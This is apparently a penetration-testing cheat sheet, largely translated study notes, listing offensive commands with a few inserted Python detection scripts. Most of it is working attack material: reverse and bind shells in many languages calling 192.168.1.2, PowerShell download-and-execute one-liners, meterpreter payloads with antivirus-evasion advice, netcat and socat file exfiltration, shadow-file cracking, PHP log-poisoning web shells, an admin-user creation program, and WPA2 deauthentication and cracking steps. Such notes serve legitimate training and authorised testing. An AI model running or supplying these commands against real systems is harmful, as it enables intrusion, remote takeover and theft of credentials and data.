MISC

Upgrade the shell to a full TTY

python -c 'import pty;pty.spawn("/bin/bash")'

Create a password hash for /etc/passwd

openssl passwd -1 -salt new 123  # 123 is the password

Create a wordlist

Create a wordlist from a URL.

cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt  # -m: minimum word length of 6.

Create a wordlist from a pattern.

  • @ lowercase letters
  • , uppercase letters
  • % digits
  • ^ special characters.
crunch 5 5 -t ,@^%^  # min and max length must equal the pattern length (5 here)

File transfer

Powercat file transfer

powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
nc -lnvp 443 > receiving_powercat.ps1

Socat file transfer

socat TCP4-LISTEN:443,fork file:secret.txt
socat TCP4:IP:PORT file:received.txt,create

Netcat

On the victim machine:
nc -w 3 IP PORT < out.file
On the attacker machine:
nc -l -p 1234 > out.file

Powercat.

powercat -c IP -p PORT -i C:\fichero.txt
nc -nlvp 443 > recibido.txt  # on Linux

WGET Powershell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://192.168.10.52:8000/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

FTP

Sending tools to the victim machine in order to transfer files can be risky because AV may detect them. On our machine we run an FTP server.

Contents of ftp.txt:
open 10.0.0.10 21
USER offsec mipassword
bin
GET nc.exe
bye

Run on Windows: ftp -v -n -s:ftp.txt

wget.vbs

https://gist.github.com/sckalath/ec7af6a1786e3de6c309

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

After you've created wget.vbs

cscript wget.vbs http://192.168.10.5/evil.exe evil.exe

Powershell oneliner

powershell.exe (New-Object System.Net.Webclient).DownloadFile('http://10.10.14.15:8000/sherlock.ps1','sherlock.ps1')

Run a ps1 without writing it to disk: powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/sherlock.ps1')

upx -9 nc.exe
exe2hex -x nc.exe -p nc.cmd
The output is pasted into the Windows box, which converts it from hex back into the binary.

Powershell file transfer

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"

Powershell upload.

On the Linux machine:

On Windows:

powershell (New-Object System.Net.Webclient).UploadFile('http://10.10.10.10/upload.php','evil.exe')

TFTP Upload

Install atftp on Kali:
mkdir /tftp
atftp --daemon --port 69 /tftp

On the Windows machine: tftp -i 10.10.10.10 put evil2.exe

Create a Windows meterpreter: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f exe -o shell.exe

After creating the payload: powershell "(New-Object System.Net.Webclient).Downloadfile('http://ip/file.exe','file.exe')"

Start the multi/handler:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT PORT
run

Finally run: Start-Process "shell.exe", or from cmd: shell.exe


Use Nishang in PowerShell to get a reverse shell:

powershell iex (New-Object Net.Webclient).DownloadString('http://IP/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT

We would have nc listening.

Upgrade from a shell to meterpreter:

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -f exe > writeup.exe
Then download it on the target machine with: powershell "(new-object System.Net.WebClient).Downloadfile('http:///writeup.exe', 'writeup.exe')"

If AV detects the meterpreter, use TrustedSec's unicorn. It generates 2 files: an .rb with the handler and another with the encoded meterpreter.

Start the handler with

msfconsole -r fichero.rb

Then run the following command, which fetches the web page and executes whatever it contains (the page must hold a PowerShell-readable payload generated by unicorn).

powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/exploit.html')"

PORT FORWARDING

ssh local port forward

ssh -L 5901:10.10.10.48:4492 root@10.10.10.47

ssh remote port forward

ssh -R 9999:localhost:8080 root@10.10.10.48

RINETD

Kali has internet access but the Debian client does not. Kali can SSH into the Debian client.

On Kali: apt-get install rinetd, then edit /etc/rinetd.conf

Add the forwarding line (bindaddress bindport connectaddress connectport):
0.0.0.0 80 216.58.207.142 80
All traffic received on the Kali server on port 80 is redirected to google.com (port 80).
service rinetd restart

Used to give a client without internet access connectivity through Kali.

SSH Local Port Forwarding.

kali -> debian -> windows2016 445. Everything sent to Kali on port 445 is forwarded to the Windows 2016 server through port 22 (SSH) on the Debian client. Debian can reach the Windows 2016 box, but Kali cannot.

Run on Kali: ssh -N -L 0.0.0.0:445:REMOTE_IP:445 student@ssh_server

SSH Remote Port Forwarding

client (with mysql) -> kali

Run on the client: ssh -N -R KALI_IP:2221:127.0.0.1:3306 kali@IP

This makes everything that arrives on port 2221 of Kali go to port 3306 on the Debian client.

SSH Dynamic Port Forwarding

Like the local port forwarding example, but not limited to a single IP or port.

Run on Kali: ssh -N -D 127.0.0.1:8080 student@IP

nano /etc/proxychains.conf
socks4 127.0.0.1 8080

proxychains nmap 192.168.1.1 would run nmap against a machine reachable from student but not directly from Kali.

PLINK.EXE

On student (Windows), remote port forwarding: cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R KALI_IP:1234:127.0.0.1:3306 KALI_IP

This exposes student's MySQL on port 1234 of our Kali.

NETSH

netsh is installed by default on all modern Windows versions. It needs the IP Helper service running and IPv6 enabled (enabled by default on Windows). You must be an admin to run it without UAC prompting.

kali -> student -> windows2016(445)
On the Windows machine:
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110
netsh advfirewall firewall add rule name="forward" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow

From Kali we can reach student on port 4455, which is forwarded to windows2016 on port 445.
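Defender's check, added here as an example (not part of the original notes): parse the output of `netsh interface portproxy show all` and flag rules that relay traffic to another host, which is exactly what the pivot above creates. The sample output is constructed; the same rules also persist in the registry under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp.

```python
import re

# Constructed sample of `netsh interface portproxy show all` output (same column layout as the real command).
SAMPLE_PORTPROXY_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.11.0.22      4455        192.168.1.110   445
127.0.0.1       8080        127.0.0.1       80
"""

# One rule row: listen address, listen port, connect address, connect port.
RULE_ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")


def parse_portproxy(output):
    """Return one (listen_addr, listen_port, connect_addr, connect_port) tuple per configured rule."""
    rules = []
    for line in output.splitlines():
        m = RULE_ROW.match(line.strip())
        if m:
            rules.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return rules


def relay_rules(rules, local_prefixes=("127.", "::1")):
    """Keep only rules whose connect address is another host: traffic accepted here is relayed onward."""
    return [r for r in rules if not r[2].startswith(local_prefixes)]


if __name__ == "__main__":
    for rule in relay_rules(parse_portproxy(SAMPLE_PORTPROXY_OUTPUT)):
        print("portproxy relay: %s:%d -> %s:%d" % rule)
```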

HTTP tunneling through deep packet inspection

apt-get install httptunnel

On kali:    htc --forward-port 8080 STUDENT_IP:1234
On student: hts --forward-port localhost:8888 1234
On student: ssh -L 0.0.0.0:8888:IPWINDOWS:3389 student@127.0.0.1
Chain: kali -> student -> Windows 2016. If we RDP from Kali to port 8080, the connection is forwarded to the Windows 2016 box through the HTTP tunnel via the student machine.

Socat Port Forwarding

Exposes port 8888 on localhost and forwards it to port 8080 on localhost.
socat tcp-listen:8888,reuseaddr,fork tcp:localhost:8080

Crack a ZIP

fcrackzip -u -v -D -p /home/sml/rockyou.txt save.zip

Crack an SSH key

ssh2john.py id_rsa > tocrack.txt
/usr/sbin/john --wordlist=rockyou.txt tocrack.txt

Serve the files in the current directory over HTTP:

python -m SimpleHTTPServer

Crack Linux passwords

grep victim /etc/passwd > passwd-file.txt
grep victim /etc/shadow > shadow-file.txt
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --wordlist=wordlist unshadowed.txt

Reverse shell

Bash

bash -i >& /dev/tcp/192.168.1.2/443 0>&1
bash -c "bash -i >& /dev/tcp/192.168.1.2/443 0>&1"

Bash URL encoding

bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%22

nc

nc -e /bin/sh 192.168.1.2 443
nc -e /bin/bash 192.168.1.2 443
nc -c /bin/sh 192.168.1.2 443
nc -c /bin/bash 192.168.1.2 443
nc.exe -e cmd 192.168.1.26 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f

Perl

perl -e 'use Socket;$i="192.168.1.2";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

export RHOST="192.168.1.2";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

PHP

php -r '$sock=fsockopen("192.168.1.2",443);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("192.168.1.2",443);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",443);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",443);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",443);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("192.168.1.2",443);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",443);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.1.2",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'c=TCPSocket.new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

AWK

awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Golang

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.1.2:443");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.2/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Node

require('child_process').exec('bash -i >& /dev/tcp/192.168.1.2/443 0>&1');

Powershell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("192.168.1.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1')

Powershell reverse shell

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

nc -nlvp 443

PowerShell bind shell

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

nc -nv IP PORT

Powercat reverse shell

nc -nlvp 443  # on Linux
powercat -c IP -p PORT -e cmd.exe

Powercat bind shell

powercat -l -p PORT -e cmd.exe
nc -nv IP PORT  # on Linux

Powercat standalone payloads.

powercat -c IP -p PORT -e cmd.exe -g > reverseshell.ps1
.\reverseshell.ps1  # may be detected by IDS
nc -nlvp 443  # on Linux
powercat -c IP -p PORT -e cmd.exe -ge > reverseshell.ps1  # encodes the file
nc -nlvp 443
powershell -E and paste the whole contents of reverseshell.ps1

Netcat Bind Shell

nc -nlvp 4444 -e cmd.exe

Netcat Reverse shell

nc -nlvp 4444
nc -nv IP PORT -e /bin/bash

Socat Reverse shell

socat -d -d TCP4-LISTEN:443 STDOUT
socat TCP4:IP:PORT EXEC:/bin/bash

Encrypted bind shell, used to evade IDS.

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt  # creates a self-signed certificate
cat bind_shell.key bind_shell.crt > bind_shell.pem
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:IP:PORT,verify=0
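Detection angle on the reverse-shell section above, added here as an example (not part of the original notes): a Python scan that flags the one-liners listed above when they appear in process command lines. The indicator patterns and the sample process snapshot are constructed for this example; three of its six entries reuse commands from this page.

```python
import re

# Indicators derived from the reverse-shell one-liners above; each pattern is named after the technique it matches.
REVERSE_SHELL_PATTERNS = [
    ("bash-dev-tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("nc-exec", re.compile(r"\bnc(?:\.exe)?\s+-[ce]\s+\S*(?:sh|bash|cmd)\b")),
    ("mkfifo-nc", re.compile(r"mkfifo\s+\S+.*\|\s*nc\b")),
    ("python-pty", re.compile(r"\.connect\(\(.*dup2.*pty\.spawn")),
    ("php-fsockopen", re.compile(r"fsockopen\(.*\b(?:exec|system|passthru|popen|shell_exec|proc_open)\(")),
    ("perl-socket", re.compile(r"use Socket;.*exec\(")),
    ("ps-tcpclient", re.compile(r"Net\.Sockets\.TCPClient\(.*GetStream\(\)", re.I)),
    ("ps-download-iex", re.compile(r"\b(?:iex|Invoke-Expression)\b.*DownloadString\(", re.I)),
    ("socat-exec", re.compile(r"\bsocat\s.*EXEC:", re.I)),
]


def classify_cmdline(cmdline):
    """Return the indicator names that match one process command line (empty list if none)."""
    return [name for name, rx in REVERSE_SHELL_PATTERNS if rx.search(cmdline)]


def scan_process_log(lines):
    """Scan 'PID USER CMDLINE' records (constructed format) and return (pid, user, indicators) per hit."""
    hits = []
    for line in lines:
        parts = line.strip().split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmdline = parts
        tags = classify_cmdline(cmdline)
        if tags:
            hits.append((int(pid), user, tags))
    return hits


# Constructed process snapshot: benign listeners and servers mixed with three shells from this page.
SAMPLE_PROCESS_LOG = [
    "1201 www-data bash -c \"bash -i >& /dev/tcp/192.168.1.2/443 0>&1\"",
    "1315 root sshd: student [priv]",
    "1402 student nc -lnvp 443 > receiving_powercat.ps1",
    "1533 www-data php -r '$sock=fsockopen(\"192.168.1.2\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "1610 student python3 -m http.server 8000",
    "1744 www-data rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f",
]

if __name__ == "__main__":
    for pid, user, tags in scan_process_log(SAMPLE_PROCESS_LOG):
        print(pid, user, ",".join(tags))
```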

Java Decompiler

java -jar jd-gui-1.6.6-min.jar

TCPDUMP

Read a pcap file.

tcpdump -r file.pcap

Filter by destination host.

tcpdump -n dst host IP -r file.pcap

Filter by port.

tcpdump -n port 81 -r file.pcap

Show the packets in hex and ASCII.

tcpdump -nX -r file.pcap

Create a user and add it to the administrators group.

#include <stdlib.h>

int main(void)
{
    /* Each system() call runs the Windows net command in a child cmd.exe */
    system("net user evil Ev!lpass /add");
    system("net localgroup administrators evil /add");
    return 0;
}

Compile on Linux for Windows.

i686-w64-mingw32-gcc adduser.c -o adduser.exe

Enable Windows Remote Desktop.

Allow RDP connections:
(Get-WmiObject -Class "Win32_TerminalServiceSetting" -Namespace root\cimv2\terminalservices).SetAllowTsConnections(1)

Disable NLA:
(Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)

Allow RDP through the firewall:
Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Set-NetFirewallRule -Enabled True

Log poisoning

SSH

ssh '<?php system($_GET["cmd"]); ?>'@192.168.1.2

HTTP

curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2"
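Defender-side view of the two log-poisoning commands above, added here as an example (not from the original notes): the planted PHP only becomes dangerous if a vulnerable script later includes the log file, but the injection itself is visible in the log. This scan flags PHP open tags in the attacker-controlled fields (HTTP request line, Referer, User-Agent, rejected SSH user name); the log lines are constructed.

```python
import re

# Marker of PHP code planted in a log field; both commands above use "<?php ... ?>".
PHP_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.I)

# Apache/nginx "combined" access-log format; the last quoted field is the User-Agent.
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>(?:[^"\\]|\\.)*)" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
# sshd writes the client-supplied name of an unknown account verbatim into auth.log.
SSHD_LINE = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.*?) from (?P<ip>\S+)")


def find_log_poisoning(lines):
    """Return (line_no, source, field, client_ip) for every line carrying a PHP tag in an attacker-controlled field."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = ACCESS_LINE.match(line)
        if m:
            for field in ("request", "referer", "ua"):
                if PHP_TAG.search(m.group(field)):
                    findings.append((n, "http", field, m.group("ip")))
            continue
        m = SSHD_LINE.search(line)
        if m and PHP_TAG.search(m.group("user")):
            findings.append((n, "ssh", "user", m.group("ip")))
    return findings


# Constructed log lines: normal traffic plus one poisoned User-Agent and one poisoned SSH login name.
SAMPLE_LOGS = [
    '192.168.1.50 - - [12/Jan/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.1.50 - - [12/Jan/2021:10:00:07 +0000] "GET / HTTP/1.1" 200 612 "-" "<?php system($_GET[\'cmd\']); ?>"',
    "Jan 12 10:00:15 web sshd[2211]: Invalid user <?php system($_GET['cmd']); ?> from 192.168.1.50 port 40122",
    "Jan 12 10:01:02 web sshd[2230]: Accepted publickey for student from 10.11.0.4 port 50112 ssh2",
    '10.11.0.4 - - [12/Jan/2021:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for finding in find_log_poisoning(SAMPLE_LOGS):
        print("line %d: PHP tag in %s %s field from %s" % finding)
```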

WIRELESS

WPA2 PSK process:
1) Put the card in monitor mode.
2) Look at the information: channel, BSSID, etc.
3) Select the network to capture data from.
4) Deauth attack (optional).
5) Capture the WPA handshake.
6) Crack the handshake.

1) iwconfig  # should show wlan0
airmon-ng check kill
airmon-ng start wlan0
iwconfig  # should show wlan0mon

2) Look up the information (BSSID, channel, ESSID) with: airodump-ng wlan0mon

3) This command starts trying to capture the handshake (it also shows which stations are connected): airodump-ng -c 6 --bssid 50:9C:27:31:31:10 -w micaptura wlan0mon

4) Deauth (optional): aireplay-ng -0 1 -a 50:C7:24:24:21:10 -c 3C:F0:11:22:33:44 wlan0mon

-0: deauth; 1: send it once; -a: BSSID; -c: MAC of the STATION obtained in step 3; then the interface.

5) aircrack-ng -w wordlist.txt -b 50:C7:11:22:33:44 micaptura-01.cap  # the MAC is the BSSID.